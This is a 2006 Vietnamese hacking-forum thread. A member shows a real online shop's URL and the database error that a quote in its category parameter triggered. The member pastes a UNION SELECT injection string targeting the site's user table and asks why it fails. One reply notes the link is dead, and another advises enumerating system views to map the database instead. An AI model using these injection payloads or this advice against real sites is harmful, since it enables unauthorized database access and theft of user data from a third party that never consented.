[Question] Ai có thể giải đáp cho mình lỗi SQL ịnect ko |
03/08/2006 03:26:29 (+0700) | #1 | 12042 |
minami
Member
|
0 |
|
|
Joined: 02/08/2006 16:15:58
Messages: 1
Offline
|
|
Mình tìm được trang bị lỗi thế này
http://www.questarhomevideo.com/shopdisplayproducts.asp?cat=7'
Microsoft JET Database Engine error '80040e14'
Syntax error in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like '7'%' and hide=0 order by cname'.
/shop$db.asp, line 478
Mình dùng query này để khai thác
union%20select%201%20from%20tbluser%22having%201=1--
tại sao nó không xuất hiện lỗi mà trả về 1 trang hiện hành của nó
Xin mọi người giúp đỡ lối tại sao...
|
|
|
|
|
[Question] Ai có thể giải đáp cho mình lỗi SQL ịnect ko |
03/08/2006 03:59:00 (+0700) | #2 | 12050 |
BigballVN
Elite Member
|
0 |
|
|
Joined: 12/06/2005 07:25:21
Messages: 610
Offline
|
|
Hình như link của bạn die rồi. Bạn kiểm tra lại xem |
|
|
[Question] Re: Ai có thể giải đáp cho mình lỗi SQL ịnect ko |
08/08/2006 21:14:13 (+0700) | #3 | 13216 |
evh
Member
|
0 |
|
|
Joined: 05/07/2005 14:51:51
Messages: 4
Offline
|
|
thì nó không tìm thấy row nào trong DB nên mạc định trả về trang thông báo, mà đã hiển thị thông báo lỗi trong dòng đầu rồi bạn không cố gắng môi cấu trúc dữ liệu trong DB của chúng nó mà Inject mã vào mà phải dùng UNION chi cho mệt , khai thác 2 view SYSOBJECT, SCHEMA_TABLE |
|
|
Users currently in here |
1 Anonymous
|
|
Powered by JForum - Extended by HVAOnline
hvaonline.net | hvaforum.net | hvazone.net | hvanews.net | vnhacker.org
1999 - 2013 ©
v2012|0504|218|
|
|